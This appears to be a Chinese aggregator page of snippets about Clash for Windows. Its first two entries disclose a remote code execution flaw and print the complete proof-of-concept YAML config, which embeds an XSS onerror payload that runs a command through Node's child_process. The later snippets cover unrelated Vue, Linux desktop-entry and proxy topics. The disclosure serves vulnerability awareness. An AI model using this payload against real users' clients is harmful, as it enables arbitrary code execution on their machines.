-
2022-03-03 17:40:01
Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
漏洞危害
代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令。
漏洞复现
构建恶意服务器站点,在站点部署cfg配置文件,内容如下
订阅文件
port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true proxy-groups: - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: select proxies: - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
漏洞描述
由于crash_for_windows_pkg可以根据URL下载进行配置Rules文件,crash_for_windows_pkg由Electron提供支持,该产品在代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。
漏洞范围
Clash For Windows < 0.19.9
漏洞分析
crash_for_windows_pkg 由 Electron 提供支持,该产品在代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。
"proxies"中的"name"字段嵌入html标签,"onerror"时触发语句执行。更多相关内容 -
Clash for Windows命令执行漏洞
2022-02-26 18:40:08Clash for Windows命令执行漏洞 环境: 环境地址:https://github.com/Fndroid/clash_for_windows_pkg/releases 一、编辑代码 POC地址:https://github.com/Fndroid/clash_for_windows_pkg/issues/2710 port: 7890 ...展开全文Clash for Windows命令执行漏洞
环境:
环境地址:https://github.com/Fndroid/clash_for_windows_pkg/releases
一、编辑代码
POC地址:https://github.com/Fndroid/clash_for_windows_pkg/issues/2710
port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true proxy-groups: - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: select proxies: - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>二、修改后缀为.yaml
三、导入平台
四、执行
点击代理后,会弹出计算器
-
clash_for_windows_pkg:基于Clash的WindowsmacOS GUI
2021-02-12 00:17:09Windows版冲突 基于Clash的Windows / macOS GUI -
git for windows中文汉化
2018-09-01 23:36:55根据git源码编译并制作的汉化包 git for windows 编译并添加了部分界面的汉化。 源码版本是2.17.0, 汉化方法,将压缩包解压到git安装目录 -
GitHub for windows
2019-01-31 03:31:49GitHub for windows 离线版本 对于下载慢的童鞋提供 -
cfw-scripts:在clash.for.windows中用于解析器的一些脚本
2021-04-13 10:19:08CFW脚本 用于一些脚本。 仅用于研究和测试用法,并在用法完成后自行删除代码。...用于安装Windows通知的mikaelbr/node-notifier脚本保留在Action Center中。 git clone https://github.com/yi-Xu-010 -
Clash for Windows A Windows/macOS/Linux GUI based on Clash and Electron.
-
config-for-clash:解析vmesssstrojan并创建冲突配置文件
2021-04-13 19:32:36本项目将解析vmess、ss、trojan订阅链接,并将其内容转换为clash配置文件 config.yaml 所有代码均为python 使用环境 python 3.0 需额外安装的库:requests 使用方法 打开并运行 按提示输入相关信息即可 文件介绍 log... -
-
Clash:Akun Clash untuk Android,Windows,Linux,OpenWrt
2021-03-09 02:21:38Clash:Akun Clash untuk Android,Windows,Linux,OpenWrt -
clash-config-builder:自行构建冲突配置文件!
2021-05-30 04:43:01Clash Config Builder Clash配置文件在线定义 地址 在线地址: 注意 服务商提供的Clash配置地址一般会被,所以默认情况下此工具会通过API代理其请求,如担心隐私问题,请使用!!! 使用步骤 1. 编辑基础配置文件 ... -
deepin安装clash for linux并创建图标
2020-09-26 19:21:08补充1.yaml文件就是订阅后下载的那个文件...2.如果未配置完成就运行啦clash,再配置完成,看端口进程里面会有7890进程,但是clash网页配置和代理不会激活. 重启就好了. 实在看不懂就按教程配置完重启就好了. ...展开全文安装和配置
参考https://www.cnblogs.com/sueyyyy/p/12424178.html
补充1.yaml文件就是订阅后下载的那个文件,复制订阅链接进浏览器就可以下载.打开clash目录下的yaml,复制替换内容并保存.
2.如果未配置完成就运行啦clash,再配置完成,看端口进程里面会有7890进程,但是clash网页配置和代理不会激活.
重启就好了.
实在看不懂就按教程配置完重启或者注销就好了.
创建桌面图标
之前一直失败,注意deepin的重命名显示的长度不够,所以最好终端里显示复制
可以看到这个地方很容易出错,deepin的bug估计。还有deepin文件属性信息路径无法显示全也无法查看。
如果不正确,是不会出现在图标里面的,虽然复制进了桌面文件.
[Desktop Entry] Categories=System;Application;Network; Comment=clash-for-linux Encoding=UTF-8 Exec=/home/fengmao/program/clash/clash-linux-amd64-v1.1.0 GenericName=Clash Icon=/home/fengmao/program/clash/clash.png Name=Clash-For-Linux StartupNotify=true Terminal=false Type=Application X-Deepin-Vendor=user-custom
发送到桌面图标路径
sudo desktop-file-install clash-for-linux.desktop或者
sudo cp clash-for-linux.desktop /usr/share/applications结果
-
clash for windows0.9.6_(Vue基础)6.Vue中列表渲染(v-for/set)
2020-11-23 13:50:15对数组的循环的几个问题关键词:v-for对数组/对象的循环比遍历key的唯一取值(提升性能)占位符使用(template模板占位符)改变数组内容(数组遍历方法、对数组引用的改变、set方法)改变对象内容(对属性值的直接...展开全文
对数组的循环的几个问题
关键词:
- v-for对数组/对象的循环比遍历
- key的唯一取值(提升性能)
- 占位符使用(template模板占位符)
- 改变数组内容(数组遍历方法、对数组引用的改变、set方法)
- 改变对象内容(对属性值的直接操作、对对象引用的改变、set方法)
一、v-for —— 列表渲染语法(涉及循环列表数组、对象)
最基本的列表渲染写法:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Vue中的列表渲染</title> <script src="./vue.js"></script> </head> <body> <div id="app"> <div v-for="(item, index) in list"> //最基本的列表渲染 {{item}}---{{index}} //最基本的列表渲染 </div> </div> <script> var vm = new Vue ({ el: "#app", data: { list: [ "miya wang", "2", "nice", "to", "meet", "you" ] } }) </script> </body> </html>二、:key="xxx" —— 数组循环 唯一的key值 如何使用?
涉及:遍历循环、提升性能
遍历循环,涉及多次循环或一次完成的问题。提升循环显示的性能,可以为循环项加上唯一的key值,提高性能<body> <div id="app"> <div v-for="(item, index) in list" :key="item.id"> {{item.text}}---{{index}} </div> </div> <script> var vm = new Vue ({ el: "#app", data: { list: [ { id: 010110210, text:"hello" },{ id: 010110211, text:"world" },{ id: 010110212, text:"miya" } ] } }) </script> </body>后端数据:返数据时,返回以下参数对象:
(1)id:与数据库相关的唯一的数据条目的标识符(或数据库随机的字段,字段值是唯一的标识)(2)text(内容):数据的具体内容item.id(循环的每一项+它唯一的id号码):既是唯一的,同时又不是index这个索引下标,保证的key使用的唯一性,保证了性能上的最优三、v-for——对数组的循环遍历
实现需求:改变数组内容,能够让页面变化
1、第一种:使用数组遍历的方法动态增改变内容,数据发生变化,页面跟着变化。
❌:假设,如果直接修改数组下标的话,数据会改变,但页面并不会跟着改变。
✔️:使用数组遍历方法:push(往数组里增加一条)pop(数组最后一项删除掉)shift(数组的第一项删除掉)unshift(往数组的开头添加一个或更多元素)splice(在数据里做一些截取)sort(对数组做一些排序)reverse(对数组的取反)
举例splice方法:vm.list.splice(下标,数量, 该项的具体详情)
2、第二种:改变数据的引用地址,实现数据变化,页面跟着变化
3、Vue实例中,数组上,set方法怎么使用?
(1)Vue中全局方法:Vue.set(对象, 定位下标, 要改变的具体值)
(2)Vue中实例方法:vm.$set(对象, 定位下标, 要改变的具体值)
四、template —— 占位符使用
template 模板占位符 在做多元素标签循环时,用来包裹一些元素做一个占位使用,但循环时并不会真正地渲染到页面上。如:
<div id="app"> <template v-for="(item, index) in list" :key="item.id" > <div> {{item.text}}---{{index}} </div> <span> {{item.text}} </span> </template> </div>五、v-for —— 对对象的循环遍历
<body> <div id="app"> <!-- 一些可传递的值 --> <div v-for="(item, key, index) of userInfo"> {{item}} --- {{key}} --- {{index}} </div> </div> <script> var vm = new Vue ({ el: "#app", data: { userInfo: { //常见的对象数据结构 name: "miya wang", age: "23", gender: "female", salary: "secret" } } }) </script> </body>实现需求:改变对象内属性值,数据变化,页面也跟着变
1、对象直接修改它自身的属性值(key值),数据变化,页面也会跟着变化
2、遍历对象,动态增加新的属性值:通过直接修改对象的引用,数据变化,页面内容也跟着变化
3、Vue实例中,对象上,set方法怎么使用?
(1)Vue中全局方法:Vue.set(对象, 需要改变的对象属性, 要改变的值)实现需求: 通过set方法来改变数据,从而改变页面的内容
(2)Vue的实例方法: vm.$set(对象, 需要改变的对象属性, 要改变的值)
实现需求:同上
-
pip install 代理(clash for window)网速,ssl WARNING: Retrying (Retry(total=4, connect=None, read=None...
2021-01-25 20:56:13pip_main(['install', package]) if __name__ == '__main__': with open(sys.argv[1]) as f: for line in f: install(line) 局部安装 tap代理 2021.3.15号补充 使用clash的tap模式,在网卡上代理 安装tap模式 关闭... -
MinGW-w64 - for 32 and 64 bit Windows在线安装
2017-01-21 18:36:08GCC的一个完整的编译/运行时环境(A complete runtime environment for gcc) 支持Windows 64位和32位操作系统 -
anyexec for windows_关于 Windows 的 Window
2020-11-05 04:02:33关于 Windows 的 Window当你成功进入 Windows 桌面,你所能看到的一切都可以被称之为 Window。许许多多的 Window 组合在了一起,于是便有了 Windows。桌面是 Window当你进入了 Window 系统后,就可以看到桌面 Window... -
Git for Windows 国内镜像源加速下载
2020-10-27 16:02:46Git for Windows 国内镜像源加速下载 : https://mirrors.huaweicloud.com/git-for-windows/ -
GitHubforWindows在线安装教程和离线安装包
2016-03-18 22:23:46由于本人在安装github桌面时遇到过麻烦,在这些麻烦解决了之后就整理了这么些方法,有兴趣的可以来看看,有什么问题可以私信我喔。 -
clash 全部time out解决方法
2021-06-01 17:20:511.手动设置的DNS出现了问题,改成自动的DNS后,恢复正常。 2.安装双系统后,双系统时间不同步,同步两个系统的时候后恢复正常。 -
clash节点全部timeout问题
2021-09-25 11:15:50删除先前的配置文件,然后通过url重新下载就可以解决问题了。 -
通过charles for windows进行手机抓包
2021-01-13 18:07:32windows系统:WIN10 手机系统:安卓 吐槽!!!charles官网下载太慢……了,费了我一个多小时才下了1M多,干脆找了个破解版! charles安装 charles 破解版(3.11.3b7)下载: 链接:... -
windows ubuntu16.04 双系统 ubuntu基本操作笔记
2020-07-04 07:59:13ubuntu16.04 windows7 https://blog.csdn.net/qq_28205153/article/details/52203512 -
clash_for_windows_pkg存在远程代码执行漏洞
2022-02-26 02:20:55crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。 0x01受影响的版本 版本:0.19.8 平台:windows 操作系统细节:Windows 11 ARM ... -
clash for ubuntu 遇到的问题及解决
2020-05-02 18:06:32参考https://blog.csdn.net/weixin_38333199/article/details/103033068 1.执行:sudo ./filename 时,找不到命令。... 2.在运行clash的环节,遇到 FATA[0000] Can't load mmdb: error openin... -
gitHub for windows设置网络代理
2019-10-08 13:56:24但是gitHub for windows无法设置代理。 可以通过C:\Users\admin\.gitconfig中,添加代理。 添加: [http]proxy = proxy.XX.com:8080 保存以后就可以了。 gitHub就可以在代理环境下使用了 转载于:... -
记一次 Clash 端口为0的问题
2021-10-22 02:53:17更新windows系统后,发现clash无法使用,再一看发现端口变成0而且无法更改。 经过查询后确认了是开启了hyper-V造成的,hyper-V会让win10的动态端口变成1024开始的13977个端口,然后hyper-V会随机保留端口,大概2860个... -
WSL2设置网络代理 clash for windows
2022-05-20 10:45:32打开Clash 的 Allow LAN选项 把鼠标放在Allow LAN 后会显示 主机ip 和 虚拟机ip 切换到WSL2 命令行 ,输入: export https_proxy="http://192.168.10.1:7890" export http_proxy="http://192.168.10.1:7890"... -
解决win10自带应用无法联网问题
2020-09-29 22:57:28使用clash for windows软件,里面有个 UWP Loopback 点击一下,会弹出这个界面。 然后你想让哪个软件走代理,就选中哪个软件,最后点击 Save Changes 即可。 特别注意:第一个选项不能打勾,否则设置没有作用的。 ... -
docker desktop for windows 挂载配置文件失败解决方法
2021-01-03 22:29:46redis sentinel两种启动方式: redis-sentinel sentinel.conf 或者 redis-server redis.conf --sentinel 两种方法都需要在window上面挂载配置文件,docker上面一直报如下错误: ...在网络上面找了很多方法都没有... -
Windows使用CFW
2022-04-14 17:05:31Clash有两个版本 (1)原始版本:https://github.com/Dreamacro/clash/releases (2)CFW版本:https://github.com/Fndroid/clash_for_windows_pkg/releases 推荐使用CFW版本。 1.启动 下载解压,点击Clash for ...
